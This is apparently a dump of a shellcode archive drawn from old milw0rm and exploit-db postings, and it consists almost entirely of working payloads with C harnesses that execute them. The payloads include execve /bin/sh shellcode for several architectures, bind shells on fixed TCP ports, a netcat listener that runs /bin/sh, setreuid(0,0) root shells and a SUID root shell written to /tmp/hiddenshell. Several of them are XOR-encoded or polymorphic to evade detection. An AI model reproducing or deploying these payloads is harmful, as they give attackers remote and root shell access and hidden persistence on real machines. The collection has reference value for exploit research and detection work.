"\x89\xe1" // mov %esp,%ecx 34 | "\x89\xc6" // mov %eax,%esi 35 | "\x43" // inc %ebx 36 | "\xb0\x66" // mov $0x66,%al 37 | "\xcd\x80" // int $0x80 38 | 39 | /* listen(s, anything) */ 40 | 41 | "\xb0\x66" // mov $0x66,%al 42 | "\xd1\xe3" // shl %ebx 43 | "\xcd\x80" // int $0x80 44 | 45 | /* accept(s, 0, 0) */ 46 | 47 | "\x52" // 
push %edx 48 | "\x56" // push %esi 49 | "\x89\xe1" // mov %esp,%ecx 50 | "\x43" // inc %ebx 51 | "\xb0\x66" // mov $0x66,%al 52 | "\xcd\x80" // int $0x80 53 | 54 | "\x93" // xchg %eax,%ebx 55 | 56 | /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */ 57 | 58 | "\x6a\x02" // push $0x2 59 | "\x59" // pop %ecx 60 | 61 | "\xb0\x3f" // mov $0x3f,%al 62 | "\xcd\x80" // int $0x80 63 | "\x49" // dec %ecx 64 | "\x79\xf9" // jns dup_loop 65 | 66 | /* execve("/bin/sh", ["/bin/sh"], NULL) */ 67 | 68 | "\x6a\x0b" // push $0xb 69 | "\x58" // pop %eax 70 | "\x52" // push %edx 71 | "\x68\x2f\x2f\x73\x68" // push $0x68732f2f 72 | "\x68\x2f\x62\x69\x6e" // push $0x6e69622f 73 | "\x89\xe3" // mov %esp, %ebx 74 | "\x52" // push %edx 75 | "\x53" // push %ebx 76 | "\x89\xe1" // mov %esp, %ecx 77 | "\xcd\x80"; // int $0x80 78 | 79 | int main() { 80 | 81 | int (*f)() = (int(*)())shellcode; 82 | printf("Length: %u\n", strlen(shellcode)); 83 | f(); 84 | } 85 | 86 | // milw0rm.com [2006-04-06] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__8000_TCP__Shellcode__179_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; 2 | ; Title : Bind asm code Linux x86 - 179 bytes 3 | ; IP : 0.0.0.0 4 | ; Port : 8000 5 | ; 6 | ; 7 | ; Use : nc localhost 8000 8 | ; id 9 | ; uid=0(root) gid=0(root) groupes=0(root) 10 | ; 11 | ; 12 | ; Author : Jonathan Salwan 13 | ; Mail : submit AT shell-storm.org 14 | ; Web : http://www.shell-storm.org 15 | ; 16 | ; 17 | ; More shellcodes in => http://www.shell-storm.org/shellcode/ 18 | ; 19 | 20 | 21 | section .data 22 | name db '/bin/sh', 0 23 | section .text 24 | global _start 25 | 26 | _start: 27 | ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; 28 | push byte 0x0 29 | push byte 0x1 30 | push byte 0x2 31 | 32 | mov eax, 0x66 33 | mov ebx, 0x1 34 | mov ecx, esp 35 | int 0x80 36 | 
;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; 37 | 38 | mov edx, eax 39 | 40 | ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; 41 | push byte 0x0 42 | push byte 0x0 43 | push byte 0x0 44 | push word 0x401f 45 | push word 0x2 46 | mov ebx, esp 47 | 48 | push byte 0x10 49 | push ebx 50 | push edx 51 | 52 | mov eax, 0x66 53 | mov ebx, 0x2 54 | mov ecx, esp 55 | int 0x80 56 | ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; 57 | 58 | ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; 59 | push byte 0x1 60 | push edx 61 | 62 | mov eax, 0x66 63 | mov ebx, 0x4 64 | mov ecx, esp 65 | int 0x80 66 | ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; 67 | 68 | ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; 69 | push byte 0x0 70 | push byte 0x0 71 | push edx 72 | 73 | mov eax, 0x66 74 | mov ebx, 0x5 75 | mov ecx, esp 76 | int 0x80 77 | ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; 78 | 79 | mov edx, eax 80 | 81 | ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; 82 | mov eax, 0x3f 83 | mov ebx, edx 84 | mov ebx, 0x2 85 | int 0x80 86 | 87 | mov eax, 0x3f 88 | mov ebx, edx 89 | mov ecx, 0x1 90 | int 0x80 91 | 92 | mov eax, 0x3f 93 | mov ebx, edx 94 | mov ecx, 0x0 95 | int 0x80 96 | ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; 97 | 98 | ;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; 99 | mov al, 0x0b 100 | mov ebx, name 101 | push byte 0x0 102 | push name 103 | mov ecx, esp 104 | mov edx, 0x0 105 | int 0x80 106 | ;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; 107 | 108 | ; milw0rm.com [2009-06-01] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__Random_TCP_Port__Shellcode__44_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | # Super_Small_Bind_Shell 2 (x86) 3 | # Date: 17.03.2017 4 | # This shellcode will listen on random port and show you how deep the rabbit hole goes 5 | # Please note that ports below 
1024 require high privileges to bind! 6 | # Shellcode Author: ALEH BOITSAU 7 | # Shellcode Length: 44 bytes!) 8 | # Tested on: Debian GNU/Linux 8/x86_64 9 | # Command: gcc -m32 -z execstack super_small_bind_shell2.c -o super_small_bind_shell2 10 | 11 | section .text 12 | global _start 13 | _start: 14 | 15 | xor edx, edx 16 | push edx 17 | push 0x68732f2f ;-le//bin//sh 18 | push 0x6e69622f 19 | push 0x2f656c2d 20 | mov edi, esp 21 | 22 | push edx 23 | push 0x636e2f2f ;/bin//nc 24 | push 0x6e69622f 25 | mov ebx, esp 26 | 27 | push edx 28 | push edi 29 | push ebx 30 | mov ecx, esp 31 | xor eax, eax 32 | mov al,11 33 | int 0x80 34 | 35 | */ 36 | 37 | #include 38 | #include 39 | 40 | unsigned char shellcode[] = 41 | "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x52\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"; 42 | main() 43 | { 44 | printf("Shellcode Length: %d\n",strlen(shellcode)); 45 | int (*ret)() = (int(*)())shellcode; 46 | ret(); 47 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_execve__bin_sh_Shellcode__24_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | ;Title: Linux/x86 - /bin/sh Shellcode 3 | ;Author: Touhid M.Shaikh 4 | ;Contact: https://github.com/touhidshaikh 5 | ;Category: Shellcode 6 | ;Architecture: Linux x86 7 | ;Description: This shellcode baased on stack method to Execute "/bin//sh". 8 | Length of shellcode is 24 bytes. 
9 | ;Tested on : 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 10 | 11 | 12 | 13 | ===COMPILATION AND EXECUTION=== 14 | 15 | #nasm -f elf32 shell.asm -o shell.o <=== Making Object File 16 | 17 | #ld -m elf_i386 shell.o -o shell <=== Making Binary File 18 | 19 | #./bin2shell.sh shell <== xtract hex code from the binary( 20 | https://github.com/touhidshaikh/bin2shell) 21 | 22 | 23 | 24 | =================SHELLCODE(INTEL FORMAT)================= 25 | 26 | section .text 27 | global _start 28 | _start: 29 | xor eax,eax 30 | cdq 31 | push eax 32 | push 0x68732f2f 33 | push 0x6e69622f 34 | mov ebx,esp 35 | push eax 36 | push ebx 37 | mov ecx, esp 38 | mov al,0x0b 39 | int 80h 40 | 41 | ===================END HERE============================ 42 | 43 | Compile with gcc with some options. 44 | 45 | # gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing 46 | 47 | */ 48 | 49 | #include 50 | #include 51 | 52 | 53 | unsigned char code[] = \ 54 | "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 55 | 56 | main() 57 | { 58 | 59 | printf("Shellcode Length: %d\n", (int)strlen(code)); 60 | 61 | int (*ret)() = (int(*)())code; 62 | 63 | ret(); 64 | 65 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86__Intel_x86_CPUID__-_execve__bin_sh_XORED_Encoded_Shellcode__41_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) execve("/bin/sh", ["/bin/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes 3 | * 4 | * The idea behind this shellcode is to use a *weak* pre-shared secret between the attacker and 5 | * the attacked machine. So if a 3rd party side would try to run this shellcode and would produce 6 | * a different CPUID output (e.g. different arch) the shellcode won't work. 
In addition this also 7 | * prevents from having the '/bin/sh' string visible on the wire. 8 | * 9 | * The shellcode key is (0x6c65746e, 'letn') and expected to be in %ecx register after CPUID 10 | * 11 | * - izik 12 | */ 13 | 14 | char shellcode[] = 15 | 16 | "\x31\xc0" // xor %eax,%eax 17 | "\x0f\xa2" // cpuid 18 | "\x51" // push %ecx 19 | "\x68\xe7\x95\xa8\xec" // push $0xeca895e7 20 | "\x68\xde\x7f\x37\x3f" // push $0x3f377fde 21 | "\x68\x07\x1a\xec\x8f" // push $0x8fec1a07 22 | "\x68\x6e\x1c\x4a\x0e" // push $0x0e4a1c6e 23 | "\x68\x06\x5b\x16\x04" // push $0x04165b06 24 | 25 | // 26 | // <_unpack_loop>: 27 | // 28 | 29 | "\x31\x0c\x24" // xor %ecx,(%esp) 30 | "\x5a" // pop %edx 31 | "\x75\xfa" // jne <_unpack_loop> 32 | "\x83\xec\x18" // sub $0x18,%esp 33 | "\x54" // push %esp 34 | "\xc3"; // ret 35 | 36 | int main(int argc, char **argv) { 37 | int *ret; 38 | ret = (int *)&ret + 2; 39 | (*ret) = (int) shellcode; 40 | } 41 | 42 | // milw0rm.com [2006-01-25] -------------------------------------------------------------------------------- /Linux/Linux_-_Bind_Netcat_Shell__31337_TCP__Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : nc -lp 31337 -e /bin//sh polymorphic linux shellcode . 3 | Name : 91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode . 4 | Date : Mon Jul 5 16:58:50 WIT 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 
11 | */ 12 | 13 | #include 14 | 15 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01" 16 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5" 17 | "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87" 18 | "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02" 19 | "\xb5\x96\x1d\x29\x34\x34\x34\xa3\x98\x55\x62\xa1\xa5\x55\x68" 20 | "\x66\x68\x68\x6c\x55\x62\x9a\x55\x64\x97\x9e\xa3\x64\x64\xa8" 21 | "\x9d"; 22 | 23 | int main(void) 24 | { 25 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 26 | (*(void(*)()) shellcode)(); 27 | } -------------------------------------------------------------------------------- /Linux/Linux_-_Bind_TCP_Shell__6778_TCP__XOR_Encoded_Polymorphic_Shellcode__125_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : bind port to 6678 XOR encoded polymorphic linux shellcode . 3 | Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode . 4 | Date : Tue Jul 6 01:52:33 WIT 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 
11 | */ 12 | 13 | #include 14 | 15 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff" 16 | "\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff" 17 | "\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b" 18 | "\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83" 19 | "\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a" 20 | "\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58" 21 | "\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58" 22 | "\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9" 23 | "\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a" 24 | "\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62" 25 | "\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb" 26 | "\xba\x01\xc7\x8a"; 27 | 28 | 29 | int main(void) 30 | { 31 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 32 | (*(void(*)()) shellcode)(); 33 | } -------------------------------------------------------------------------------- /Linux/Linux_-_Find_All_Writeable_Folder_In_FileSystem_Polymorphic_Shellcode__91_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Find all writeable folder in filesystem linux polymorphic shellcode . 3 | Name : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode . 4 | Date : Sat Jun 17 21:27:03 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 
11 | */ 12 | 13 | #include 14 | 15 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01" 16 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5" 17 | "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87" 18 | "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02" 19 | "\xb5\x96\x1d\x29\x34\x34\x34\x9b\x9e\xa3\x99\x55\x64\x55\x62" 20 | "\xa9\xae\xa5\x9a\x55\x99\x55\x62\xa5\x9a\xa7\xa2\x55\x6c\x6c" 21 | "\x6c"; 22 | 23 | int main(void) 24 | { 25 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 26 | (*(void(*)()) shellcode)(); 27 | } -------------------------------------------------------------------------------- /Linux/Linux_-_Write_SUID_Root_Shell___tmp__hiddenshell__Polymorphic_Shellcode__161_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author : gunslinger_ 3 | Web : http://devilzc0de.org 4 | blog : http://gunslingerc0de.wordpress.com 5 | tested on : linux debian 6 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (exploit-db.com) 7 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 
8 | */ 9 | 10 | #include 11 | 12 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x89\x80\x6c\x0e\xff\x35\x80\xe9\x01" 13 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5" 14 | "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87" 15 | "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02" 16 | "\xb5\x96\x1d\x29\x34\x34\x34\x98\xa5\x55\x64\x97\x9e\xa3\x64" 17 | "\x64\xa8\x9d\x55\x64\xa9\xa2\xa5\x64\x63\x9d\x9e\x99\x99\x9a" 18 | "\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d\xa4\xac\xa3\x55\xa7" 19 | "\xa4\xa4\xa9\x6f\xa7\xa4\xa4\xa9\x55\x64\xa9\xa2\xa5\x64\x63" 20 | "\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d" 21 | "\xa2\xa4\x99\x55\x69\x6c\x6a\x6a\x55\x64\xa9\xa2\xa5\x64\x63" 22 | "\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1"; 23 | 24 | int main(void) 25 | { 26 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 27 | (*(void(*)()) shellcode)(); 28 | } -------------------------------------------------------------------------------- /Linux/Linux_-_setreuid_0,0__+_execve___bin_sh_,NULL,NULL__XOR_Encoded_Shellcode__62_bytes___Shellcode_exploit_for_Linux_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author : gunslinger_ 3 | Web : http://devilzc0de.org 4 | blog : http://gunslingerc0de.wordpress.com 5 | tested on : linux debian 6 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 7 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 
8 | */ 9 | 10 | #include 11 | 12 | char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x26\x80\x74\x0e\xff\x01" 13 | "\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff" 14 | "\x30\xc1\x30\xda\x30\xc8\x30\xd3\xb1\x47\x30\xda" 15 | "\x30\xc8\xcc\x81\xb1\x0a\x52\x69\x2e\x2e\x72\x69" 16 | "\x69\x2e\x63\x68\x6f\x88\xe2\x30\xc8\x30\xc8\x52" 17 | "\xcc\x81"; 18 | 19 | int main(void) 20 | { 21 | fprintf(stdout,"Length: %d\n",strlen(shellcode)); 22 | (*(void(*)()) shellcode)(); 23 | } -------------------------------------------------------------------------------- /Multiple/BSD_x86___Linux_x86_-_execve__bin_sh_Shellcode__38_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux/x86 and Bsd/x86 3 | * 4 | * execve() of /bin/sh by dymitri!!! 5 | * 6 | */ 7 | 8 | 9 | 10 | #include 11 | char 12 | code[] = 13 | "\x31\xc0" 14 | "\x50" 15 | "\x68\x2f\x2f\x73\x68" 16 | "\x68\x2f\x62\x69\x6e" 17 | "\x89\xe3" 18 | "\x50" 19 | "\x54" 20 | "\x53" 21 | "\x50" 22 | "\x8c\xe0" 23 | "\x21\xc0" 24 | "\x74\x04" 25 | "\xb0\x3b" 26 | "\xeb\x07" /* si es bsd saltamos los 7 bytes para llegar al int $0x80 */ 27 | "\xb0\x0b" 28 | "\x99" /* En caso contrario si %fs es igual a 0 configuramos para que la ejecucion sea sobre linux */ 29 | "\x52" 30 | "\x53" 31 | "\x89\xe1" 32 | "\xcd\x80"; 33 | main() 34 | { 35 | void (*s)() = (void *)code; 36 | printf("Shellcode length: %d\nExecuting..\n\n", 37 | strlen(code)); 38 | s(); 39 | } 40 | 41 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Multiple/Linux_PPC___Linux_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__99_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * -[ dual-linux.c ]- 3 | * by core@bokeoa.com (ripped from nemo@felinemenace.org) 4 | * ^-- much <3 brotha ;) 5 | * 6 | * 
execve("/bin/sh",{"/bin/sh",NULL},NULL) shellcode for linux (both the ppc 7 | * and x86 version.) I thought about adding mipsel but I don't feel up to it 8 | * at the moment. In fact I feel like crap... 9 | * 10 | * Shoutz to nemo, andrewg, KF, ghandi, phased, MRX, Blue Boar, Solar Eclipse, 11 | * HDM, FX, Max Vision, MaXx, c0ntex, izik, xort, banned-it, hoglund, SkyLined, 12 | * Gera, Stealth (7350), Emmanuel, Hackademy, Raptor (0xdeadbeef), sh0k, jduck, 13 | * xfocus, LSD, ADM, b10z, 0dd, ES, runixd, packy, norse, mXn, thn, dragnet, 14 | * hdm, fozzy, str0ke, B|ueberry, , rjohnson, Kaliman, capsyl, salvia, 15 | * amnesia, arcanum, eazyass, loophole, my family and so any others... 16 | * 17 | * irc.pulltheplug.org #social 18 | * 19 | * peace ~ metta ~ 20 | * 21 | * References: 22 | * http://milw0rm.com/id.php?id=1318 23 | * http://www.phrack.org/phrack/57/p57-0x0e 24 | */ 25 | 26 | char dual_linux[] = 27 | // 28 | // These four bytes work out to the following instruction 29 | // in ppc arch: "rlwnm r16,r28,r29,13,4", which will 30 | // basically do nothing on osx/ppc. 31 | // 32 | // However on x86 architecture the four bytes are 3 33 | // instructions: 34 | // 35 | // "push/nop/jmp" 36 | // 37 | // In this way, execution will be taken to the x86 shellcode 38 | // on an x86 machine, and the ppc shellcode when running 39 | // on a ppc architecture machine. 40 | // 41 | "\x5f\x90\xeb\x48" 42 | 43 | "\x69\x69\x69\x69" /*nop*/ 44 | "\x69\x69\x69\x69" /*nop*/ 45 | "\x69\x69\x69\x69" /*nop*/ 46 | // linux/ppc execve /bin/sh by Charles Stevenson (core) 47 | "\x7c\x3f\x0b\x78" /*mr r31,r1 # optional instruction */ 48 | "\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ 49 | "\x42\x40\xff\xf9" /*bdzl+ 10000454
*/ 50 | "\x7f\x08\x02\xa6" /*mflr r24*/ 51 | "\x3b\x18\x01\x34" /*addi r24,r24,308*/ 52 | "\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ 53 | "\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ 54 | "\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ 55 | "\x38\x81\xff\xf8" /*addi r4,r1,-8*/ 56 | "\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ 57 | "\x3b\xc0\x01\x60" /*li r30,352*/ 58 | "\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ 59 | "\x44\xde\xad\xf2" /*.long 0x44deadf2*/ 60 | "/bin/shZ" // the last byte becomes NULL 61 | 62 | // lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload 63 | // Copyright(c) 2005 c0ntex 64 | // Copyright(c) 2005 BaCkSpAcE 65 | "\x6a\x0b\x58\x99\x52\x68\x2f\x2f" 66 | "\x73\x68\x68\x2f\x62\x69\x6e\x54" 67 | "\x5b\x52\x53\x54\x59\x0f\x34"; 68 | 69 | int main(int ac, char **av) 70 | { 71 | void (*fp)() = dual_linux; 72 | fp(); 73 | } 74 | 75 | // in loving memory of hack.co.za 76 | 77 | // milw0rm.com [2005-11-15] -------------------------------------------------------------------------------- /Multiple/Linux_x86___Unix_SPARC_-_execve__bin_sh_Shellcode__80_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux/x86 and Unix/Sparc 3 | * 4 | * execve() of /bin/sh by dymitri!!! 
5 | * 6 | */ 7 | 8 | #include 9 | 10 | char wcode[]= 11 | 12 | "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" 13 | "\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10" 14 | "\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a" 15 | "\x82\x10\x20\x3b\x91\xd0\x20\x08" 16 | "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 17 | 18 | main() 19 | { 20 | void (*s)() = (void *)wcode; 21 | printf("MULtiplataforma: %d\n\n", 22 | strlen(wcode)); 23 | s(); 24 | } 25 | 26 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- /Multiple/Linux_x86___Unix_SPARC___IRIX_MIPS_-_execve__bin_sh_Shellcode__141_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode ejecuta execve /bin/sh en Irix/mips, Linux/x86, Unix/sparc by dymitr1 3 | dymitri666@hotmail.com 4 | */ 5 | 6 | #include 7 | 8 | char code[]= 9 | "\x37\x37\xeb\x2f\x30\x80\x00\x12\x04\x10\xff\xff\x24\x02\x03\xf3\x23\xff\x02\x14\x23\xe4\xfe\x08" 10 | "\x23\xe5\xfe\x10\xaf\xe4\xfe\x10\xaf\xe0\xfe\x14\xa3\xe0\xfe\x0f" 11 | "\x03\xff\xff\xcc" 12 | "/bin/sh" 13 | "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" 14 | "\x37\x37\x37\x37\x37" 15 | "\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68" 16 | "\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec" 17 | "\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b" 18 | "\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08"; 19 | main() 20 | { 21 | void (*s)() = (void *)code; 22 | printf("Shellcode length: %d\nExecuting..\n\n", 23 | strlen(code)); 24 | s(); 25 | } 26 | 27 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- 
/Multiple/OSX_PPC___OSX_x86_-_execve___bin_sh_,___bin_sh_,NULL_,NULL__Shellcode__121_bytes___Shellcode_exploit_for_Multiple_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * -[ dual.c ]- 3 | * by nemo@felinemenace.org 4 | * 5 | * execve("/bin/sh",{"/bin/sh",NULL},NULL) shellcode 6 | * for osx (both the ppc and x86 version.) 7 | * 8 | * Sample output: 9 | * 10 | * -[nemo@squee:~/shellcode]$ file dual-ppc 11 | * dual-ppc: Mach-O executable ppc 12 | * -[nemo@squee:~/shellcode]$ ./dual-ppc 13 | * sh-2.05b$ exit 14 | * 15 | * -[nemo@squee:~/shellcode]$ file dual-x86 16 | * dual-x86: Mach-O executable i386 17 | * -[nemo@squee:~/shellcode]$ ./dual-x86 18 | * sh-2.05b$ exit 19 | */ 20 | 21 | char dual[] = 22 | // 23 | // These four bytes work out to the following instruction 24 | // in ppc arch: "rlwnm r16,r28,r29,13,4", which will 25 | // basically do nothing on osx/ppc. 26 | // 27 | // However on x86 architecture the four bytes are 3 28 | // instructions: 29 | // 30 | // "push/nop/jmp" 31 | // 32 | // In this way, execution will be taken to the x86 shellcode 33 | // on an x86 machine, and the ppc shellcode when running 34 | // on a ppc architecture machine. 
35 | // 36 | "\x5f\x90\xeb\x48" 37 | 38 | // ppc execve() code by b-r00t 39 | "\x7c\xa5\x2a\x79\x40\x82\xff\xfd" 40 | "\x7d\x68\x02\xa6\x3b\xeb\x01\x70" 41 | "\x39\x40\x01\x70\x39\x1f\xfe\xcf" 42 | "\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" 43 | "\x90\x61\xff\xf8\x90\xa1\xff\xfc" 44 | "\x38\x81\xff\xf8\x38\x0a\xfe\xcb" 45 | "\x44\xff\xff\x02\x7c\xa3\x2b\x78" 46 | "\x38\x0a\xfe\x91\x44\xff\xff\x02" 47 | "\x2f\x62\x69\x6e\x2f\x73\x68\x58" 48 | 49 | // osx86 execve() code by nemo 50 | "\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f" 51 | "\x57\x53\x54\x54\x57\x6a\xff\x88\x5f" 52 | "\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff" 53 | "\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff" 54 | "\xff/bin/shX"; 55 | 56 | int main(int ac, char **av) 57 | { 58 | void (*fp)() = dual; 59 | fp(); 60 | } 61 | 62 | // milw0rm.com [2005-11-13] -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 